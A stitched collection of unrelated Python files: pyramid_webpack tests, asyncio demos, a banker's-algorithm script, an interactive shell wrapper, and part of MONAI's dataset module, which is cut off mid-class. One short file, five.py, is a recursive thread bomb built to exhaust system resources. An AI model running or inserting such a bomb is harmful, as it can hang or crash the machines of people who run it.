state = WebpackState(settings)
state.load_stats(cache=False)
data = {'b': 'c'}
with open(stats_file, 'w') as ofile:
json.dump(data, ofile)
stats = state.load_stats(cache=False)
self.assertEqual(stats, data)
def test_multiple_configs(self):
""" Multiple webpack states can have their own configs """
settings = {
'webpack.stats_file': 'foo',
'webpack.other.stats_file': 'bar',
}
state = WebpackState(settings)
self.assertTrue(state.stats_file.path.endswith(':foo'))
other_state = WebpackState(settings, name='other')
self.assertTrue(other_state.stats_file.path.endswith(':bar'))
def test_no_wait_for_compile(self):
""" The load_stats() call doesn't block if wait=False """
data = {'status': 'compiling'}
stats_file = self._write('stats.json', data)
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
queue = run_load_stats(state, wait=False)
# Blocks & doesn't raise an exception
stats = queue.get(True, 0.1)
self.assertEqual(stats, data)
def test_wait_for_compile(self):
""" The load_stats() call blocks until webpack is done compiling """
stats_file = self._write('stats.json', {'status': 'compiling'})
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
queue = run_load_stats(state, wait=True)
with self.assertRaises(Empty):
queue.get(True, 0.1)
stats = {'status': 'done'}
with open(stats_file, 'w') as ofile:
json.dump(stats, ofile)
data = queue.get(True, 5)
self.assertEqual(data, stats)
def test_compile_timeout(self):
""" The load_stats() call will timeout if compile takes too long """
stats_file = self._write('stats.json', {'status': 'compiling'})
settings = {
'webpack.stats_file': stats_file,
'webpack.timeout': 0.5,
}
state = WebpackState(settings)
with self.assertRaises(RuntimeError):
state.load_stats(wait=True)
def test_load_bad_data(self):
""" load_stats() raises ValueError if json data is bad """
stats_file = self._write('stats.json', {})
with open(stats_file, 'a') as ofile:
ofile.write('aaaaa')
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
with self.assertRaises(ValueError):
state.load_stats()
def test_abs_static_view(self):
""" Absolute bundle directory paths are stored unmodified """
settings = {
'webpack.bundle_dir': '/foo/bar/baz',
}
state = WebpackState(settings)
self.assertEqual(state.static_view_path, '/foo/bar/baz')
def test_unspecified_relative_bundle(self):
""" Relative bundle_dir paths with no package are given one """
settings = {
'webpack.bundle_dir': 'bundles',
}
state = WebpackState(settings, 'mypackage')
self.assertEqual(state.static_view_path, 'mypackage:bundles')
def test_static_package_resource(self):
""" StaticResource can load a package resource """
resource = StaticResource('pyramid_webpack:jinja2ext.py')
import pyramid_webpack.jinja2ext
with resource.open() as i:
self.assertEqual(i.read(),
inspect.getsource(pyramid_webpack.jinja2ext))
def test_future_expire(self):
""" cache_max_age = future uses 10 year expiration """
settings = {
'webpack.cache_max_age': 'future',
}
state = WebpackState(settings, 'mypackage')
self.assertTrue(state.cache_max_age > 100000)
def test_custom_expire(self):
""" cache_max_age can specify view expiration """
settings = {
'webpack.cache_max_age': '1234',
}
state = WebpackState(settings, 'mypackage')
self.assertEqual(state.cache_max_age, 1234)
def test_default_expire_debug(self):
""" cache_max_age defaults to None in debug mode """
settings = {
'webpack.debug': 'true',
}
state = WebpackState(settings, 'mypackage')
self.assertIsNone(state.cache_max_age)
def test_default_expire(self):
""" cache_max_age defaults to 3600 in non-debug mode """
settings = {
'webpack.debug': 'false',
}
state = WebpackState(settings, 'mypackage')
self.assertEqual(state.cache_max_age, 3600)
class TestWebpack(unittest.TestCase):
""" Test class for the Webpack functions """
def setUp(self):
super(TestWebpack, self).setUp()
self.request = MagicMock()
self.webpack = Webpack(self.request)
self.webpack.state = WebpackState({})
self.stats = {
'status': 'done',
'chunks': {
'main': [
{
'name': 'main.js',
'path': '/static/main.js',
}
],
},
}
self.webpack.state._load_stats = MagicMock()
self.webpack.state._load_stats.return_value = self.stats
def test_get_bundle(self):
""" get_bundle() returns the chunks with a 'url' key added """
bundle = self.webpack.get_bundle('main')
self.assertEqual(bundle, self.stats['chunks']['main'])
def test_filter_extensions(self):
""" get_bundle() can filter by file extension """
chunk = {
'name': 'main.css',
'path': '/static/main.css',
}
self.stats['chunks']['main'].append(chunk)
bundle = self.webpack.get_bundle('main', '.css')
self.assertEqual(bundle, [chunk])
def test_filter_multiple_extensions(self):
""" get_bundle() can filter by multiple file extensions """
chunk = {
'name': 'main.css',
'path': '/static/main.css',
}
self.stats['chunks']['main'].append(chunk)
bundle = self.webpack.get_bundle('main', '.js .css')
self.assertEqual(bundle, self.stats['chunks']['main'])
def test_filter_ignore(self):
""" get_bundle() can ignore files by glob """
chunk = {
'name': 'main.css',
'path': '/static/main.css',
}
self.stats['chunks']['main'].append(chunk)
self.webpack.state.ignore = ['*.css']
bundle = self.webpack.get_bundle('main')
self.assertEqual(bundle, self.stats['chunks']['main'][:1])
def test_filter_ignore_re(self):
""" get_bundle() can ignore files by regular expression """
chunk = {
'name': 'main.css',
'path': '/static/main.css',
}
self.stats['chunks']['main'].append(chunk)
self.webpack.state.ignore_re = [re.compile(r'.*\.css')]
bundle = self.webpack.get_bundle('main')
self.assertEqual(bundle, self.stats['chunks']['main'][:1])
def test_public_path(self):
""" pulicPath in a chunk becomes the url """
url = 'https://assets.cdn.com/main.js'
self.stats['chunks']['main'][0]['publicPath'] = url
bundle = self.webpack.get_bundle('main')
self.assertEqual(bundle[0]['url'], url)
def test_bad_bundle(self):
""" Getting a nonexistant bundle raises an exception """
with self.assertRaises(KeyError):
self.webpack.get_bundle('nope')
def test_error_status(self):
""" If stats has error status, raise an error """
self.stats['status'] = 'error'
self.stats['error'] = 'FrobnicationError'
self.stats['message'] = 'Retro quarks emitted during Frobnication'
with self.assertRaises(RuntimeError):
self.webpack.get_bundle('main')
def test_bad_status(self):
""" If stats has unknown status, raise an error """
self.stats['status'] = 'wat'
with self.assertRaises(RuntimeError):
self.webpack.get_bundle('main')
def test_missing_state(self):
""" Raise an error if no WebpackState found """
req = MagicMock()
req.registry.webpack = {}
with self.assertRaises(RuntimeError):
Webpack(req)
def _get_bundle(request):
""" Route view for the test webapp """
config = request.matchdict['config']
bundle_name = request.matchdict['bundle']
bundle = request.webpack(config).get_bundle(bundle_name)
renderer = request.params.get('renderer')
if renderer:
return render_to_response(renderer, {})
else:
return bundle
class TestWebapp(TempDirTest):
""" Pyramid app tests """
def setUp(self):
super(TestWebapp, self).setUp()
self.stats1 = {
'status': 'done',
'chunks': {
'main': [
{
'name': 'main.js',
'path': '/static/main.js',
},
],
},
}
self.stats2 = {
'status': 'done',
'chunks': {
'libs': [
{
'name': 'libs.js',
'path': '/static/libs.js',
},
],
},
}
settings = {
'pyramid.includes': ['pyramid_jinja2', 'pyramid_webpack'],
'jinja2.extensions': ['pyramid_webpack.jinja2ext:WebpackExtension'],
'jinja2.directories': ['tests:templates/'],
'webpack.debug': True,
'webpack.stats_file': self._write('stats1.json', self.stats1),
'webpack.configs': ['other'],
'webpack.other.stats_file': self._write('stats2.json', self.stats2),
}
config = Configurator(settings=settings)
config.add_route('bundle', '/bundle/{config}/{bundle}')
config.add_view(_get_bundle, route_name='bundle', renderer='json')
app = config.make_wsgi_app()
self.app = webtest.TestApp(app)
def tearDown(self):
self.app.reset()
def test_get_bundle(self):
""" get_bundle() returns a list of all chunks in the bundle """
res = self.app.get('/bundle/DEFAULT/main')
bundle = json.loads(res.body.decode('utf-8'))
expected = self.stats1['chunks']['main'][0]
self.assertEqual(len(bundle), 1)
self.assertEqual(bundle[0]['name'], expected['name'])
self.assertEqual(bundle[0]['path'], expected['path'])
self.assertTrue('url' in bundle[0])
def test_get_second_bundle(self):
""" get_bundle() works with the secondary webpack configs """
res = self.app.get('/bundle/other/libs')
bundle = json.loads(res.body.decode('utf-8'))
expected = self.stats2['chunks']['libs'][0]
self.assertEqual(len(bundle), 1)
self.assertEqual(bundle[0]['name'], expected['name'])
self.assertEqual(bundle[0]['path'], expected['path'])
self.assertTrue('url' in bundle[0])
def test_jinja2(self):
""" The jinja2 extension can use 'webasset' blocks """
res = self.app.get('/bundle/DEFAULT/main?renderer=paths.jinja2')
expected = self.stats1['chunks']['main'][0]
self.assertEqual(res.body.decode('utf-8'), expected['path'] + '\n')
def test_jinja2_ext(self):
""" The jinja2 extension can specify file extensions """
res = self.app.get('/bundle/other/libs?renderer=paths2.jinja2')
expected = self.stats2['chunks']['libs'][0]
self.assertEqual(res.body.decode('utf-8'), expected['path'] + '\n')
|
event_loop_in_processes.py
|
import asyncio
import os
import random
import typing
from multiprocessing import Process
processes = []
def cleanup():
global processes
while processes:
proc = processes.pop()
try:
proc.join()
except KeyboardInterrupt:
proc.terminate()
async def worker():
random_delay = random.randint(0, 3)
result = await asyncio.sleep(random_delay, result=f"Working in process: {os.getpid()}")
print(result)
def process_main(coro_worker: typing.Callable, num_of_coroutines: int, ):
loop = asyncio.new_event_loop()
try:
workers = [coro_worker() for _ in range(num_of_coroutines)]
loop.run_until_complete(asyncio.gather(*workers, loop=loop))
except KeyboardInterrupt:
print(f"Stopping {os.getpid()}")
loop.stop()
finally:
loop.close()
def main(processes, num_procs, num_coros, process_main):
for _ in range(num_procs):
proc = Process(target=process_main, args=(worker, num_coros))
processes.append(proc)
proc.start()
if __name__ == '__main__':
try:
main(processes, 10, 2, process_main, )
except KeyboardInterrupt:
print("CTRL+C was pressed.. Stopping all subprocesses..")
finally:
cleanup()
print("Cleanup finished")
|
deadlock.py
|
import numpy as np
import psutil
import time
import subprocess as sp
from threading import Thread
import matplotlib.pyplot as plt
# mat = {'p0': ['cpu', 'mem', 'storage']}
cpu = []
store = []
mem = []
need = {
'p0': [0, 1, 0, 0],
'p1': [0, 4, 2, 1],
'p2': [1, 0, 0, 1],
'p3': [0, 0, 2, 0],
'p4': [0, 6, 4, 2]
}
allocation = {
'p0': [0, 1, 1, 0],
'p1': [1, 2, 3, 1],
'p2': [1, 3, 6, 5],
'p3': [0, 6, 3, 2],
'p4': [0, 0, 1, 4]
}
work = ['p0', 'p1', 'p2', 'p3', 'p4']
available = [1, 5, 2, 0]
safe_sequence = [] # [p1,p3,p4,p0,p2]
def banker():
global available
global need
global safe_sequence
j = 0 # keeping index
while len(work) > 0:
i = work[j] # process of jth index
# if np.array_equal(np.maximum(available, need[i]), available) == True:
if not (False in list(np.greater_equal(available, need[i]))):
available = np.add(available, allocation[i])
safe_sequence.append(i)
work.remove(i)
if j == len(work): # if last element is removed, index decreases
j = 0
else:
j = (j + 1) % len(work)
# safe seq
s_seq = ''
for i in range(len(safe_sequence)):
if i != (len(safe_sequence) - 1):
s_seq += f'{safe_sequence[i]}->'
else:
s_seq += f'{safe_sequence[i]}'
print(s_seq)
print(need)
print(list(available))
def get_cpu():
prev_t = 0
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
#return delta # Returns CPU util in percentage
cpu.append(delta)
def get_mem():
cmd = ['cat /proc/meminfo | grep MemFree |cut -d ":" -f 2 | cut -d "k" -f 1']
free_mem = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
cmd = [' cat /proc/meminfo | grep MemAva |cut -d ":" -f 2 | cut -d "k" -f 1']
total_mem = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
mem_util = (int(free_mem.strip())/int(total_mem.strip()))*100
#return mem_util # Returns memory util in percentage
mem.append(mem_util)
def get_storage():
cmd = ['df -t ext4 | tail -n 2 | head -n 1 | cut -d " " -f 14 | cut -c 1-2']
storage = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
#return int(storage.strip()) # Returns storage in percentage
store.append(int(storage.strip()))
def get_resource_util():
h1 = Thread(target=get_mem)
h2 = Thread(target=get_cpu)
h3 = Thread(target=get_storage)
h1.start()
h2.start()
h3.start()
def calculate_mov_avg(a1):
ma1=[] # moving average list
avg1=0 # movinf average pointwise
count=0
for i in range(len(a1)):
count+=1
avg1=((count-1)*avg1+a1[i])/count
ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return ma1
def plot_resource_util():
global mem
global store
global cpu
plt.ion()
plt.grid(True, color='k')
plt.plot(calculate_mov_avg(cpu), linewidth=5, label='CPU')
plt.plot(calculate_mov_avg(mem), linewidth=5, label='Memory')
plt.plot(calculate_mov_avg(store), linewidth=5, label='Storage')
plt.title('Resource Utilization')
plt.ylabel('Utilization in percentage')
plt.xlabel('Time (scale of 2 seconds)')
plt.legend()
plt.pause(2)
banker()
|
interactive_shell.py
|
# -*- coding: UTF8 -*-
import sys
from subprocess import PIPE, Popen
from threading import Thread
from Queue import Queue, Empty
import time
import traceback
ON_POSIX = 'posix' in sys.builtin_module_names
def write_output(out, queue):
try:
for c in iter(lambda: out.read(1), b""):
queue.put(c)
out.close()
except Exception as e:
print(traceback.format_exc())
def flush_loop(queue, encoding):
try:
while True:
buf=b""
while True:
try:
buf+=queue.get_nowait()
except Empty:
break
if buf:
if encoding:
try:
buf=buf.decode(encoding)
except Exception:
pass
sys.stdout.write(buf)
sys.stdout.flush()
time.sleep(0.5)
except Exception as e:
print(traceback.format_exc())
def interactive_open(program=None, encoding=None):
try:
if program is None:
if "win" in sys.platform.lower():
program="cmd.exe"
encoding="cp437"
else:
program="/bin/sh"
encoding=None
print "Opening interactive %s ... (encoding : %s)"%(program,encoding)
p = Popen([program], stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, shell=True, close_fds=ON_POSIX, universal_newlines=True)
q = Queue()
q2 = Queue()
t = Thread(target=write_output, args=(p.stdout, q))
t.daemon = True
t.start()
t = Thread(target=write_output, args=(p.stderr, q2))
t.daemon = True
t.start()
t = Thread(target=flush_loop, args=(q, encoding))
t.daemon = True
t.start()
t = Thread(target=flush_loop, args=(q2, encoding))
t.daemon = True
t.start()
while True:
line = input()
p.stdin.write(line+"\n")
if line.strip()=="exit":
break
except Exception as e:
print(traceback.format_exc())
|
five.py
|
from threading import Thread
def bomb():
t1 = Thread(target=bomb).start()
t2 = Thread(target=bomb).start()
t1.join()
t2.join()
bomb()
|
dynamicCoro.py
|
import asyncio
from threading import Thread
async def production_task():
i = 0
while 1:
# 将consumption这个协程每秒注册一个到运行在线程中的循环,thread_loop每秒会获得一个一直打印i的无限循环任务
asyncio.run_coroutine_threadsafe(consumption(i),
thread_loop) # 注意:run_coroutine_threadsafe 这个方法只能用在运行在线程中的循环事件使用
await asyncio.sleep(2) # 必须加await
i += 1
async def consumption(i):
while True:
print("我是第{}任务".format(i))
await asyncio.sleep(1)
def start_loop(loop):
# 运行事件循环, loop以参数的形式传递进来运行
asyncio.set_event_loop(loop)
loop.run_forever()
#消费者循环
thread_loop = asyncio.new_event_loop() # 获取一个事件循环
run_loop_thread = Thread(target=start_loop, args=(thread_loop,)) # 将次事件循环运行在一个线程中,防止阻塞当前主线程
run_loop_thread.start() # 运行线程,同时协程事件循环也会运行
#生产者循环
advocate_loop = asyncio.get_event_loop() # 将生产任务的协程注册到这个循环中
advocate_loop.run_until_complete(production_task()) # 运行次循环
|
dataset.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import convert_tables_to_dicts, first, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform
from monai.utils import MAX_SEED, ensure_tuple, get_seed, min_version, optional_import
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
it can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{ { {
'image': 'image1.nii.gz', 'image': 'image2.nii.gz', 'image': 'image3.nii.gz',
'label': 'label1.nii.gz', 'label': 'label2.nii.gz', 'label': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
the `cache_dir` before applying the remaining random dependant transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
followed by applying the random dependant parts of transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
The input data must be a list of file paths and will hash them as cache keys.
When loading persistent cache content, it can't guarantee the cached data matches current
transform chain, so please make sure to use exactly the same non-random transforms and the
args as the cache content, otherwise, it may cause unexpected errors.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependant on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is not None:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(_item_transformed, temp_hash_file)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
class CacheNTransDataset(PersistentDataset):
"""
Extension of `PersistentDataset`, tt can also cache the result of first N transforms, no matter it's random or not.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the N element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the N transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the N + 1 transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first N transform)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`LMDBDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.pickle_protocol = pickle_protocol
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
Check the LMDB cache and write the cache if needed. py-lmdb doesn't have a good support for concurrent write.
This method can be used with multiple processes, but it may have a negative impact on the performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
if the item is not found in the lmdb file, resolves to the persistent cache default behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
class CacheDataset(Dataset):
"""
